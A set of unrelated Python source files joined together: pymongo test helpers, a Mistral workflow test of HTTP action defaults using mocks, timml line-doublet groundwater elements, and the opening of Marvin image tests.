        if e.code == 13 or 'unauthorized' in msg or 'login' in msg:
            # Unauthorized.
            return True
        raise
    # MongoDB >= 2.0
    if 'parsed' in command_line:
        parsed = command_line['parsed']
        # MongoDB >= 2.6
        if 'security' in parsed:
            security = parsed['security']
            # >= rc3
            if 'authorization' in security:
                return security['authorization'] == 'enabled'
            # < rc3: a keyFile implies auth as well.
            return security.get('auth', False) or bool(security.get('keyFile'))
        return parsed.get('auth', False) or bool(parsed.get('keyFile'))
    # Legacy
    argv = command_line['argv']
    return '--auth' in argv or '--keyFile' in argv
def server_started_with_nojournal(client):
    """Return True if journaling was disabled at server startup."""
    opts = get_command_line(client)
    # MongoDB 2.6+: journaling lives under storage.journal.enabled.
    if 'parsed' in opts:
        storage = opts['parsed'].get('storage', {})
        if 'journal' in storage:
            return not storage['journal']['enabled']
    # Older servers: look for the nojournal option itself.
    return server_started_with_option(client, '--nojournal', 'nojournal')
def server_is_master_with_slave(client):
    """Return True if the server runs in legacy master/slave master mode."""
    opts = get_command_line(client)
    if 'parsed' not in opts:
        return '--master' in opts['argv']
    return opts['parsed'].get('master', False)
def drop_collections(db):
    """Drop every non-system collection in *db*."""
    user_collections = [name for name in db.collection_names()
                        if not name.startswith('system')]
    for name in user_collections:
        db.drop_collection(name)
def remove_all_users(db):
    """Delete every user defined on *db*, using the test write concern."""
    if Version.from_client(db.client).at_least(2, 5, 3, -1):
        # Modern servers have a dedicated command for this.
        db.command("dropAllUsersFromDatabase", 1,
                   writeConcern={"w": client_context.w})
        return
    # Legacy servers: wipe the system.users collection directly.
    legacy_db = db.client.get_database(
        db.name, write_concern=WriteConcern(w=client_context.w))
    legacy_db.system.users.delete_many({})
def joinall(threads):
    """Join threads with a 5-minute timeout, assert joins succeeded.

    Uses ``Thread.is_alive()``: the camelCase ``isAlive()`` alias was
    deprecated and removed in Python 3.9, so the original call raised
    AttributeError on modern interpreters.
    """
    for t in threads:
        t.join(300)
        assert not t.is_alive(), "Thread %s hung" % t
def connected(client):
    """Block until the newly-constructed *client* has connected; return it."""
    with warnings.catch_warnings():
        # "ismaster" is always routed to the primary regardless of the
        # client's read preference, which may emit a UserWarning.
        warnings.simplefilter("ignore", UserWarning)
        client.admin.command('ismaster')  # Force connection.
    return client
def wait_until(predicate, success_description, timeout=10):
    """Poll *predicate* every 100 ms until it returns a truthy value.

    Returns the predicate's first truthy value.  If *timeout* seconds
    (default 10) elapse first, raises
    ``AssertionError("Didn't ever <success_description>")``.

    E.g.::

        wait_until(lambda: client.primary == ('a', 1),
                   'connect to the primary')
    """
    deadline = time.time() + timeout
    while True:
        result = predicate()
        if result:
            return result
        if time.time() > deadline:
            raise AssertionError("Didn't ever %s" % success_description)
        time.sleep(0.1)
def is_mongos(client):
    """Return True if *client* is connected to a mongos router."""
    reply = client.admin.command('ismaster')
    msg = reply.get('msg', '')
    return msg == 'isdbgrid'
def enable_text_search(client):
    """Enable the textSearchEnabled server parameter cluster-wide.

    Sets the parameter on the server *client* is connected to, then on
    each secondary, authenticating there when the test setup requires it.
    """
    client.admin.command(
        'setParameter', textSearchEnabled=True)
    # NOTE: host/port here deliberately shadow the module-level test
    # host/port imported from `test` -- they are per-secondary addresses.
    for host, port in client.secondaries:
        client = MongoClient(host, port)
        if client_context.auth_enabled:
            client.admin.authenticate(db_user, db_pwd)
        client.admin.command('setParameter', textSearchEnabled=True)
def assertRaisesExactly(cls, fn, *args, **kwargs):
    """
    Unlike the standard assertRaises, this checks that a function raises a
    specific class of exception, and not a subclass. E.g., check that
    MongoClient() raises ConnectionFailure but not its subclass, AutoReconnect.
    """
    try:
        fn(*args, **kwargs)
    except Exception as exc:
        actual = exc.__class__
        assert actual == cls, "got %s, expected %s" % (
            actual.__name__, cls.__name__)
    else:
        raise AssertionError("%s not raised" % cls)
@contextlib.contextmanager
def ignore_deprecations():
    """Context manager that silences DeprecationWarning inside its body."""
    catcher = warnings.catch_warnings()
    catcher.__enter__()
    try:
        warnings.simplefilter("ignore", DeprecationWarning)
        yield
    finally:
        # Restore the caller's warning filters even if the body raised.
        catcher.__exit__(None, None, None)
def read_from_which_host(
        client,
        pref,
        tag_sets=None,
):
    """Read from a client with the given Read Preference.

    Return the 'host:port' which was read from, or None if the read
    failed with AutoReconnect.

    :Parameters:
      - `client`: A MongoClient
      - `pref`: A ReadPreference instance
      - `tag_sets`: List of dicts of tags for data-center-aware reads
    """
    db = client.pymongo_test
    # A single dict is treated as a one-element list of tag sets.
    if isinstance(tag_sets, dict):
        tag_sets = [tag_sets]
    if tag_sets:
        # Rebuild the preference with the requested tag sets.
        tags = tag_sets or pref.tag_sets
        pref = pref.__class__(tags)
    db.read_preference = pref
    cursor = db.test.find()
    try:
        try:
            next(cursor)
        except StopIteration:
            # No documents in collection, that's fine
            pass
        return cursor.address
    except AutoReconnect:
        return None
def assertReadFrom(testcase, client, member, *args, **kwargs):
    """Check that a query with the given mode and tag_sets reads from
    the expected replica-set member.

    :Parameters:
      - `testcase`: A unittest.TestCase
      - `client`: A MongoClient
      - `member`: A host:port expected to be used
      - `mode`: A ReadPreference
      - `tag_sets` (optional): List of dicts of tags for data-center-aware reads
    """
    # Repeat to guard against a lucky random choice of member.
    for _attempt in range(10):
        actual = read_from_which_host(client, *args, **kwargs)
        testcase.assertEqual(member, actual)
def assertReadFromAll(testcase, client, members, *args, **kwargs):
    """Check that a query with the given mode and tag_sets reads from all
    members in a set, and only members in that set.

    :Parameters:
      - `testcase`: A unittest.TestCase
      - `client`: A MongoClient
      - `members`: Sequence of host:port expected to be used
      - `mode`: A ReadPreference
      - `tag_sets` (optional): List of dicts of tags for data-center-aware reads
    """
    expected = set(members)
    # 100 reads gives every member a chance to be selected.
    observed = {read_from_which_host(client, *args, **kwargs)
                for _ in range(100)}
    testcase.assertEqual(expected, observed)
def get_pool(client):
    """Get the standalone, primary, or mongos pool."""
    topology = client._get_topology()
    writable_server = topology.select_server(writable_server_selector)
    return writable_server.pool
def get_pools(client):
    """Get all pools."""
    servers = client._get_topology().select_servers(any_server_selector)
    return [server.pool for server in servers]
# Constants for run_threads and lazy_client_trial.
NTRIALS = 5
NTHREADS = 10
def run_threads(collection, target):
    """Run a target function in many threads.

    target is a function taking a Collection and an integer.
    """
    threads = []
    for i in range(NTHREADS):
        bound_target = partial(target, collection, i)
        threads.append(threading.Thread(target=bound_target))
    for t in threads:
        t.start()
    for t in threads:
        t.join(30)
        # is_alive(): the camelCase isAlive() alias was removed in
        # Python 3.9, so the original call failed on modern interpreters.
        assert not t.is_alive()
@contextlib.contextmanager
def frequent_thread_switches():
    """Make concurrency bugs more likely to manifest."""
    interval = None
    is_jython = sys.platform.startswith('java')
    if not is_jython:
        if hasattr(sys, 'getswitchinterval'):
            # Python 3: shrink the switch interval to ~1 microsecond.
            interval = sys.getswitchinterval()
            sys.setswitchinterval(1e-6)
        else:
            # Python 2: force a check after every bytecode instruction.
            interval = sys.getcheckinterval()
            sys.setcheckinterval(1)
    try:
        yield
    finally:
        # Always restore the interpreter's original setting.
        if not is_jython:
            if hasattr(sys, 'setswitchinterval'):
                sys.setswitchinterval(interval)
            else:
                sys.setcheckinterval(interval)
def lazy_client_trial(reset, target, test, get_client):
    """Test concurrent operations on a lazily-connecting client.

    `reset` takes a collection and resets it for the next trial.

    `target` takes a lazily-connecting collection and an index from
    0 to NTHREADS, and performs some operation, e.g. an insert.

    `test` takes the lazily-connecting collection and asserts a
    post-condition to prove `target` succeeded.
    """
    collection = client_context.client.pymongo_test.test
    # Narrow the interpreter's thread-switch interval so races surface.
    with frequent_thread_switches():
        for i in range(NTRIALS):
            reset(collection)
            # Fresh client each trial: its first real connection happens
            # lazily, under concurrent load from run_threads.
            lazy_client = get_client()
            lazy_collection = lazy_client.pymongo_test.test
            run_threads(lazy_collection, target)
            test(lazy_collection)
| |
# Copyright 2015 - StackStorm, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mock
from oslo_config import cfg
from oslo_log import log as logging
import requests
import testtools
from mistral.actions import std_actions
from mistral.db.v2 import api as db_api
from mistral.services import workflows as wf_service
from mistral.tests import base as test_base
from mistral.tests.unit.engine import base
from mistral.workflow import states
LOG = logging.getLogger(__name__)
# Use the set_default method to set value otherwise in certain test cases
# the change in value is not permanent.
cfg.CONF.set_default('auth_enable', False, group='pecan')
# Workflow-environment defaults for std.http: every task that does not
# pass these parameters explicitly inherits them via '__actions'.
ENV = {
    '__actions': {
        'std.http': {
            'auth': 'librarian:password123',
            'timeout': 30,
        }
    }
}
# (user, password) tuple that requests' `auth` kwarg should receive when
# the 'auth' default above is applied.
EXPECTED_ENV_AUTH = ('librarian', 'password123')
WORKFLOW1 = """
---
version: "2.0"
wf1:
type: direct
tasks:
task1:
action: std.http url="https://api.library.org/books"
publish:
result: <% $ %>
"""
WORKFLOW2 = """
---
version: "2.0"
wf2:
type: direct
tasks:
task1:
action: std.http url="https://api.library.org/books" timeout=60
publish:
result: <% $ %>
"""
WORKFLOW1_WITH_ITEMS = """
---
version: "2.0"
wf1_with_items:
type: direct
input:
- links
tasks:
task1:
with-items: link in <% $.links %>
action: std.http url=<% $.link %>
publish:
result: <% $ %>
"""
WORKFLOW2_WITH_ITEMS = """
---
version: "2.0"
wf2_with_items:
type: direct
input:
- links
tasks:
task1:
with-items: link in <% $.links %>
action: std.http url=<% $.link %> timeout=60
publish:
result: <% $ %>
"""
class ActionDefaultTest(base.EngineTestCase):
    """Engine tests for action defaults supplied through the workflow
    environment's ``__actions`` section.

    requests.request and HTTPAction.is_sync are mocked in every test, so
    no real HTTP traffic occurs; each test inspects the mock's call
    arguments to verify which defaults were (or were not) applied.
    """
    @mock.patch.object(
        requests, 'request',
        mock.MagicMock(return_value=test_base.FakeHTTPResponse('', 200, 'OK')))
    @mock.patch.object(
        std_actions.HTTPAction, 'is_sync',
        mock.MagicMock(return_value=True))
    def test_action_defaults_from_env(self):
        # wf1's task passes neither auth nor timeout, so both must come
        # from the ENV defaults.
        wf_service.create_workflows(WORKFLOW1)
        wf_ex = self.engine.start_workflow('wf1', None, env=ENV)
        self._await(lambda: self.is_execution_success(wf_ex.id))
        wf_ex = db_api.get_workflow_execution(wf_ex.id)
        self.assertEqual(states.SUCCESS, wf_ex.state)
        self._assert_single_item(wf_ex.task_executions, name='task1')
        requests.request.assert_called_with(
            'GET', 'https://api.library.org/books',
            params=None, data=None, headers=None, cookies=None,
            allow_redirects=None, proxies=None, verify=None,
            auth=EXPECTED_ENV_AUTH,
            timeout=ENV['__actions']['std.http']['timeout'])
    @mock.patch.object(
        requests, 'request',
        mock.MagicMock(return_value=test_base.FakeHTTPResponse('', 200, 'OK')))
    @mock.patch.object(
        std_actions.HTTPAction, 'is_sync',
        mock.MagicMock(return_value=True))
    def test_action_defaults_from_env_not_applied(self):
        # wf2's task passes timeout=60 explicitly, which must override
        # the ENV default (auth still comes from ENV).
        wf_service.create_workflows(WORKFLOW2)
        wf_ex = self.engine.start_workflow('wf2', None, env=ENV)
        self._await(lambda: self.is_execution_success(wf_ex.id))
        wf_ex = db_api.get_workflow_execution(wf_ex.id)
        self.assertEqual(states.SUCCESS, wf_ex.state)
        self._assert_single_item(wf_ex.task_executions, name='task1')
        requests.request.assert_called_with(
            'GET', 'https://api.library.org/books',
            params=None, data=None, headers=None, cookies=None,
            allow_redirects=None, proxies=None, verify=None,
            auth=EXPECTED_ENV_AUTH,
            timeout=60
        )
    @mock.patch.object(
        requests, 'request',
        mock.MagicMock(return_value=test_base.FakeHTTPResponse('', 200, 'OK')))
    @mock.patch.object(
        std_actions.HTTPAction, 'is_sync',
        mock.MagicMock(return_value=True))
    @testtools.skip("Fix 'with-items'.")
    def test_with_items_action_defaults_from_env(self):
        # Same as test_action_defaults_from_env but for a with-items task:
        # every iteration should inherit the ENV defaults.
        wf_service.create_workflows(WORKFLOW1_WITH_ITEMS)
        wf_input = {
            'links': [
                'https://api.library.org/books',
                'https://api.library.org/authors'
            ]
        }
        wf_ex = self.engine.start_workflow(
            'wf1_with_items',
            wf_input,
            env=ENV
        )
        self._await(lambda: self.is_execution_success(wf_ex.id))
        wf_ex = db_api.get_workflow_execution(wf_ex.id)
        self.assertEqual(states.SUCCESS, wf_ex.state)
        self._assert_single_item(wf_ex.task_executions, name='task1')
        calls = [mock.call('GET', url, params=None, data=None,
                           headers=None, cookies=None,
                           allow_redirects=None, proxies=None,
                           auth=EXPECTED_ENV_AUTH, verify=None,
                           timeout=ENV['__actions']['std.http']['timeout'])
                 for url in wf_input['links']]
        requests.request.assert_has_calls(calls, any_order=True)
    @mock.patch.object(
        requests, 'request',
        mock.MagicMock(return_value=test_base.FakeHTTPResponse('', 200, 'OK')))
    @mock.patch.object(
        std_actions.HTTPAction, 'is_sync',
        mock.MagicMock(return_value=True))
    @testtools.skip("Fix 'with-items'.")
    def test_with_items_action_defaults_from_env_not_applied(self):
        # with-items variant of the override test: explicit timeout=60
        # wins over the ENV default for every iteration.
        wf_service.create_workflows(WORKFLOW2_WITH_ITEMS)
        wf_input = {
            'links': [
                'https://api.library.org/books',
                'https://api.library.org/authors'
            ]
        }
        wf_ex = self.engine.start_workflow(
            'wf2_with_items',
            wf_input,
            env=ENV
        )
        self._await(lambda: self.is_execution_success(wf_ex.id))
        wf_ex = db_api.get_workflow_execution(wf_ex.id)
        self.assertEqual(states.SUCCESS, wf_ex.state)
        self._assert_single_item(wf_ex.task_executions, name='task1')
        calls = [mock.call('GET', url, params=None, data=None,
                           headers=None, cookies=None,
                           allow_redirects=None, proxies=None,
                           auth=EXPECTED_ENV_AUTH, verify=None,
                           timeout=60)
                 for url in wf_input['links']]
        requests.request.assert_has_calls(calls, any_order=True)
| |
import numpy as np
import matplotlib.pyplot as plt
import inspect # Used for storing the input
from .element import Element
from .besselaesnumba import besselaesnumba
besselaesnumba.initialize()
try:
from .src import besselaesnew
besselaesnew.besselaesnew.initialize()
#print('succes on f2py')
except:
pass
from .controlpoints import controlpoints
from .equation import DisvecEquation, LeakyWallEquation
__all__ = ['ImpLineDoublet', 'ImpLineDoubletString', 'LeakyLineDoublet',
'LeakyLineDoubletString']
class LineDoubletHoBase(Element):
    """Base class for a higher-order line-doublet between (x1, y1) and
    (x2, y2).

    The strength (potential jump ``delp``) varies along the element as a
    polynomial of degree ``order``; there is one parameter per order per
    layer, so ``nparam = nlayers * (order + 1)``.
    """
    def __init__(self, model, x1=-1, y1=0, x2=1, y2=0, delp=0.0, res=0.0,
                 layers=0, order=0, name='LineDoubletHoBase',
                 label=None, addtomodel=True, aq=None, zcinout=None):
        Element.__init__(self, model, nparam=1, nunknowns=0, layers=layers,
                         name=name, label=label)
        self.x1 = float(x1)
        self.y1 = float(y1)
        self.x2 = float(x2)
        self.y2 = float(y2)
        self.delp = np.atleast_1d(delp).astype('d')
        self.res = np.atleast_1d(res).astype('d')
        self.order = order
        # One parameter per polynomial order per layer.
        self.nparam = self.nlayers * (self.order + 1)
        self.addtomodel = addtomodel
        if addtomodel: self.model.add_element(self)
        self.aq = aq
        self.zcinout = zcinout
        # Select the compiled (f2py) or numba Bessel backend.
        if self.model.f2py:
            self.bessel = besselaesnew.besselaesnew
        else:
            self.bessel = besselaesnumba
    def __repr__(self):
        return self.name + ' from ' + str((self.x1, self.y1)) + ' to ' + str(
            (self.x2, self.y2))
    def initialize(self):
        # Geometry in complex form; control points are placed along the
        # element, plus points slightly inside/outside of it (either from
        # zcinout or offset by +-1e-6) for the boundary equations.
        self.ncp = self.order + 1
        self.z1 = self.x1 + 1j * self.y1
        self.z2 = self.x2 + 1j * self.y2
        self.L = np.abs(self.z1 - self.z2)
        self.thetaNormOut = np.arctan2(self.y2 - self.y1,
                                       self.x2 - self.x1) - np.pi / 2.0
        self.cosnorm = np.cos(self.thetaNormOut) * np.ones(self.ncp)
        self.sinnorm = np.sin(self.thetaNormOut) * np.ones(self.ncp)
        #
        self.xc, self.yc = controlpoints(self.ncp, self.z1, self.z2, eps=0)
        if self.zcinout is not None:
            self.xcin, self.ycin = controlpoints(self.ncp, self.zcinout[0],
                                                 self.zcinout[1], eps=0)
            self.xcout, self.ycout = controlpoints(self.ncp, self.zcinout[2],
                                                   self.zcinout[3], eps=0)
        else:
            self.xcin, self.ycin = controlpoints(self.ncp, self.z1, self.z2,
                                                 eps=1e-6)
            self.xcout, self.ycout = controlpoints(self.ncp, self.z1, self.z2,
                                                   eps=-1e-6)
        if self.aq is None:
            self.aq = self.model.aq.find_aquifer_data(self.xc[0], self.yc[0])
        # Transmissivity over wall resistance (res=inf -> impermeable wall).
        self.resfac = self.aq.T[self.layers] / self.res
        if self.addtomodel:
            self.aq.add_element(self)
        self.parameters = np.empty((self.nparam, 1))
        # Not sure if this needs to be here
        self.parameters[:, 0] = self.delp
    def potinf(self, x, y, aq=None):
        '''Can be called with only one x,y value
        Returns array(nparam, self.aq.naq) with order
        order 0, layer[0]
        order 0, layer[1]
        ...
        order 1, layer[0]
        order 1, layer[1]
        etc
        '''
        if aq is None: aq = self.model.aq.find_aquifer_data(x, y)
        rv = np.zeros((self.nparam, aq.naq))
        if aq == self.aq:
            potrv = rv.reshape((self.order + 1, self.nlayers,
                                aq.naq))  # clever way of using a reshaped rv here
            pot = np.zeros((self.order + 1, aq.naq))
            pot[:, :] = self.bessel.potbesldv(float(x), float(y), self.z1, self.z2, aq.lab,
                                              self.order, aq.ilap, aq.naq)
            # Writing through potrv fills rv in the documented ordering.
            potrv[:] = self.aq.coef[self.layers] * pot[:, np.newaxis, :]
        return rv
    def disvecinf(self, x, y, aq=None):
        '''Can be called with only one x,y value
        Returns array(nparam, self.aq.naq) with order
        order 0, layer[0]
        order 0, layer[1]
        ...
        order 1, layer[0]
        order 1, layer[1]
        etc
        '''
        if aq is None: aq = self.model.aq.find_aquifer_data(x, y)
        rv = np.zeros((2, self.nparam, aq.naq))
        if aq == self.aq:
            qxqyrv = rv.reshape((2, self.order + 1, self.nlayers,
                                 aq.naq))  # clever way of using a reshaped rv here
            qxqy = np.zeros((2 * (self.order + 1), aq.naq))
            qxqy[:, :] = self.bessel.disbesldv(float(x), float(y), self.z1, self.z2, aq.lab,
                                               self.order, aq.ilap, aq.naq)
            # First half of qxqy holds the Qx terms, second half the Qy terms.
            qxqyrv[0, :] = self.aq.coef[self.layers] * qxqy[:self.order + 1,
                                                            np.newaxis, :]
            qxqyrv[1, :] = self.aq.coef[self.layers] * qxqy[self.order + 1:,
                                                            np.newaxis, :]
        return rv
    def plot(self, layer=None):
        # Draw the element as a black line if it is present in `layer`.
        if (layer is None) or (layer in self.layers):
            plt.plot([self.x1, self.x2], [self.y1, self.y2], 'k')
class ImpLineDoublet(LineDoubletHoBase, DisvecEquation):
    """
    Create a segment of an impermeable wall, which is
    simulated with a line-doublet

    Parameters
    ----------
    model : Model object
        Model to which the element is added
    x1 : scalar
        x-coordinate of first point of line-doublet
    y1 : scalar
        y-coordinate of first point of line-doublet
    x2 : scalar
        x-coordinate of second point of line-doublet
    y2 : scalar
        y-coordinate of second point of line-doublet
    order : int (default is 0)
        polynomial order of potential jump along line-doublet
        (head jump if transmissivity is equal on each side of wall)
    layers : scalar, list or array
        layer(s) in which element is placed
        if scalar: element is placed in this layer
        if list or array: element is placed in all these layers
    label: str or None
        label of element

    See Also
    --------
    :class:`.ImpLineDoubletString`
    """
    def __init__(self, model, x1=-1, y1=0, x2=1, y2=0,
                 order=0, layers=0, label=None, addtomodel=True):
        self.storeinput(inspect.currentframe())
        # An impermeable wall is a leaky wall with infinite resistance.
        LineDoubletHoBase.__init__(
            self, model, x1=x1, y1=y1, x2=x2, y2=y2, delp=0, res=np.inf,
            layers=layers, order=order, name='ImpLineDoublet',
            label=label, addtomodel=addtomodel)
        self.nunknowns = self.nparam
    def initialize(self):
        # All geometry/control-point setup lives in the base class.
        LineDoubletHoBase.initialize(self)
    def setparams(self, sol):
        # Store the solved strength parameters.
        self.parameters[:, 0] = sol
class LeakyLineDoublet(LineDoubletHoBase, LeakyWallEquation):
    """
    Create a segment of a leaky wall, which is
    simulated with a line-doublet. The specific discharge through
    the wall is equal to the head difference across the wall
    divided by the resistance of the wall.

    Parameters
    ----------
    model : Model object
        Model to which the element is added
    x1 : scalar
        x-coordinate of first point of line-doublet
    y1 : scalar
        y-coordinate of first point of line-doublet
    x2 : scalar
        x-coordinate of second point of line-doublet
    y2 : scalar
        y-coordinate of second point of line-doublet
    res : scalar
        resistance of leaky wall
    order : int (default is 0)
        polynomial order of potential jump along line-doublet
        (head jump if transmissivity is equal on each side of wall)
    layers : scalar, list or array
        layer(s) in which element is placed
        if scalar: element is placed in this layer
        if list or array: element is placed in all these layers
    label: str or None
        label of element

    See Also
    --------
    :class:`.LeakyLineDoubletString`
    """
    def __init__(self, model, x1=-1, y1=0, x2=1, y2=0, res=0,
                 order=0, layers=0, label=None, addtomodel=True):
        self.storeinput(inspect.currentframe())
        # BUG FIX: name was 'ImpLineDoublet' (copy-paste from the
        # impermeable variant), which mislabeled this element in repr()
        # and any name-based reporting.
        LineDoubletHoBase.__init__(self, model, x1, y1, x2, y2, delp=0,
                                   res=res, layers=layers, order=order,
                                   name='LeakyLineDoublet', label=label,
                                   addtomodel=addtomodel)
        self.nunknowns = self.nparam
    def initialize(self):
        # All geometry/control-point setup lives in the base class.
        LineDoubletHoBase.initialize(self)
    def setparams(self, sol):
        # Store the solved strength parameters.
        self.parameters[:, 0] = sol
class LineDoubletStringBase(Element):
    """Base class for a polyline of connected line-doublet segments.

    Builds one LineDoubletHoBase per segment (none of which is added to
    the model itself) and aggregates their control points and influence
    functions so the string behaves as a single element.
    """
    def __init__(self, model, xy, closed=False, layers=0, order=0, res=0,
                 name='LineDoubletStringBase', label=None, aq=None):
        Element.__init__(self, model, nparam=1, nunknowns=0, layers=layers, \
                         name=name, label=label)
        self.xy = np.atleast_2d(xy).astype('d')
        # A closed string repeats the first node at the end.
        if closed: self.xy = np.vstack((self.xy, self.xy[0]))
        self.order = order
        self.aq = aq
        self.ldlist = []
        self.x, self.y = self.xy[:, 0], self.xy[:, 1]
        self.Nld = len(self.x) - 1
        for i in range(self.Nld):
            # Child segments are not added to the model; the string is.
            self.ldlist.append(
                LineDoubletHoBase(model, x1=self.x[i], y1=self.y[i], x2=self.x[i + 1],
                                  y2=self.y[i + 1], delp=0.0, res=res, layers=layers,
                                  order=order, label=label, addtomodel=False, aq=aq))
    def __repr__(self):
        return self.name + ' with nodes ' + str(self.xy)
    def initialize(self):
        for ld in self.ldlist:
            ld.initialize()
        self.ncp = self.Nld * self.ldlist[
            0].ncp  # Same order for all elements in string
        self.nparam = self.Nld * self.ldlist[0].nparam
        self.nunknowns = self.nparam
        self.xld = np.empty((self.Nld, 2))
        self.yld = np.empty((self.Nld, 2))
        for i, ld in enumerate(self.ldlist):
            self.xld[i, :] = [ld.x1, ld.x2]
            self.yld[i, :] = [ld.y1, ld.y2]
        if self.aq is None:
            self.aq = self.model.aq.find_aquifer_data(self.ldlist[0].xc[0],
                                                      self.ldlist[0].yc[0])
        self.parameters = np.zeros((self.nparam, 1))
        ## As parameters are only stored for the element not the list, we need to combine the following
        self.xc = np.array([ld.xc for ld in self.ldlist]).flatten()
        self.yc = np.array([ld.yc for ld in self.ldlist]).flatten()
        self.xcin = np.array([ld.xcin for ld in self.ldlist]).flatten()
        self.ycin = np.array([ld.ycin for ld in self.ldlist]).flatten()
        self.xcout = np.array([ld.xcout for ld in self.ldlist]).flatten()
        self.ycout = np.array([ld.ycout for ld in self.ldlist]).flatten()
        self.cosnorm = np.array([ld.cosnorm for ld in self.ldlist]).flatten()
        self.sinnorm = np.array([ld.sinnorm for ld in self.ldlist]).flatten()
        self.aqin = self.model.aq.find_aquifer_data(self.xcin[0], self.ycin[0])
        self.aqout = self.model.aq.find_aquifer_data(self.xcout[0],
                                                     self.ycout[0])
        # All segments share one res, so one resfac suffices.
        self.resfac = self.ldlist[0].resfac
    def potinf(self, x, y, aq=None):
        # Stack the per-segment influence arrays into (nparam, naq).
        if aq is None: aq = self.model.aq.find_aquifer_data(x, y)
        rv = np.zeros((self.Nld, self.ldlist[0].nparam, aq.naq))
        for i in range(self.Nld):
            rv[i] = self.ldlist[i].potinf(x, y, aq)
        rv.shape = (self.nparam, aq.naq)
        return rv
    def disvecinf(self, x, y, aq=None):
        # Stack the per-segment discharge influences into (2, nparam, naq).
        if aq is None: aq = self.model.aq.find_aquifer_data(x, y)
        rv = np.zeros((2, self.Nld, self.ldlist[0].nparam, aq.naq))
        for i in range(self.Nld):
            rv[:, i] = self.ldlist[i].disvecinf(x, y, aq)
        rv.shape = (2, self.nparam, aq.naq)
        return rv
    def plot(self, layer=None):
        # Draw the whole polyline in black if it is present in `layer`.
        if (layer is None) or (layer in self.layers):
            plt.plot(self.x, self.y, 'k')
class ImpLineDoubletString(LineDoubletStringBase, DisvecEquation):
    """
    Create a string of impermeable wall segements consisting
    of line-doublets

    Parameters
    ----------
    model : Model object
        Model to which the element is added
    xy : array or list
        list or array of (x,y) pairs of coordinates of end-points of
        the segements in the string
    layers : scalar, list or array
        layer(s) in which element is placed
        if scalar: element is placed in this layer
        if list or array: element is placed in all these layers
    order : int (default is 0)
        polynomial order of potential jump along line-doublet
        (head jump if transmissivity is equal on each side of wall)
    label: str or None
        label of element

    See Also
    --------
    :class:`.ImpLineDoublet`
    """
    def __init__(self, model, xy=[(-1, 0), (1, 0)],
                 layers=0, order=0, label=None):
        self.storeinput(inspect.currentframe())
        # Impermeable wall: infinite resistance on every segment.
        LineDoubletStringBase.__init__(
            self, model, xy, closed=False, res=np.inf, layers=layers,
            order=order, name='ImpLineDoubletString', label=label, aq=None)
        self.model.add_element(self)
    def initialize(self):
        LineDoubletStringBase.initialize(self)
        self.aq.add_element(self)
    def setparams(self, sol):
        # Store the solved strength parameters.
        self.parameters[:, 0] = sol
class LeakyLineDoubletString(LineDoubletStringBase, LeakyWallEquation):
    """
    Create a string of leaky wall segements consisting
    of line-doublets

    Parameters
    ----------
    model : Model object
        Model to which the element is added
    xy : array or list
        list or array of (x,y) pairs of coordinates of end-points of
        the segements in the string
    res : scalar
        resistance of leaky wall
    layers : scalar, list or array
        layer(s) in which element is placed
        if scalar: element is placed in this layer
        if list or array: element is placed in all these layers
    order : int (default is 0)
        polynomial order of potential jump along line-doublet
        (head jump if transmissivity is equal on each side of wall)
    label: str or None
        label of element

    See Also
    --------
    :class:`.LeakyLineDoublet`
    """
    def __init__(self, model, xy=[(-1, 0), (1, 0)], res=np.inf,
                 layers=0, order=0, label=None):
        self.storeinput(inspect.currentframe())
        # BUG FIX: name was 'ImpLineDoubletString' (copy-paste from the
        # impermeable variant), mislabeling this element in repr()/output.
        LineDoubletStringBase.__init__(self, model, xy, closed=False,
                                       layers=layers, order=order, res=res,
                                       name='LeakyLineDoubletString',
                                       label=label, aq=None)
        self.model.add_element(self)
    def initialize(self):
        LineDoubletStringBase.initialize(self)
        self.aq.add_element(self)
    def setparams(self, sol):
        # Store the solved strength parameters.
        self.parameters[:, 0] = sol
| |
# !usr/bin/env python2
# -*- coding: utf-8 -*-
#
# Licensed under a 3-clause BSD license.
#
# @Author: Brian Cherinka
# @Date: 2017-02-01 17:41:51
# @Last modified by: Brian Cherinka
# @Last Modified time: 2017-02-19 16:51:20
from __future__ import print_function, division, absolute_import
import unittest
import os
import glob
import warnings
from marvin import config
from marvin.core.exceptions import MarvinError, MarvinUserWarning
from marvin.tools.plate import Plate
from marvin.tests import MarvinTest, skipIfNoBrian
from marvin.utils.general.images import getImagesByList, getImagesByPlate, getRandomImages, getDir3d, showImage
try:
from sdss_access import RsyncAccess, AccessError
except ImportError:
Path = None
RsyncAccess = None
class TestImagesBase(MarvinTest):
    """Shared fixture for the image-utility tests.

    Provides known plate-ifus, local/remote redux base URLs, and helpers
    to build expected image paths and manage a downloadable test cube.
    """
    @classmethod
    def setUpClass(cls):
        super(TestImagesBase, cls).setUpClass()
        cls.imagelist = ['8485-1901', '7443-12701', '7443-1901']
        cls.mastar_plateifu = '8705-1901'
        cls.new_plateifu = '7495-1901'
        cls.new_plate = 7495
        cls.new_ifu = '1901'
        cls.new_file = 'manga-{0}-LOGCUBE.fits.gz'.format(cls.new_plateifu)
        cls.remoteredux = 'https://sdss@dtn01.sdss.org/sas/mangawork/manga/spectro/redux/'
        cls.remoteurl = 'https://data.sdss.org/sas/mangawork/manga/spectro/redux/'
    @classmethod
    def tearDownClass(cls):
        pass
    def setUp(self):
        # Reset config to a known MPL-4 + DB-on state before every test.
        self._reset_the_config()
        self.set_sasurl('local')
        self.mode = self.init_mode
        config.setMPL('MPL-4')
        config.forceDbOn()
        self.drpver, __ = config.lookUpVersions(release=config.release)
    def tearDown(self):
        # Remove any PNGs downloaded during the test, then drop the test
        # cube for both releases.
        plate, ifu = self.new_plateifu.split('-')
        newdir = os.path.join(self.mangaredux, self.drpver, plate, 'stack/images')
        newpath = os.path.join(newdir, '*.png')
        newfiles = glob.glob(newpath)
        for file in newfiles:
            if os.path.isfile(file):
                os.remove(file)
        self._remove_cube(release='MPL-5')
        self._remove_cube(release='MPL-4')
    def _make_paths(self, basepath, mode=None, inputs=None):
        # Build the expected <base>/<drpver>/<plate>/<dir3d>/images/<ifu>.png
        # path for each plate-ifu in `inputs` (defaults to cls.imagelist).
        fullpaths = []
        inputs = self.imagelist if not inputs else inputs
        for plateifu in inputs:
            plateid, ifu = plateifu.split('-')
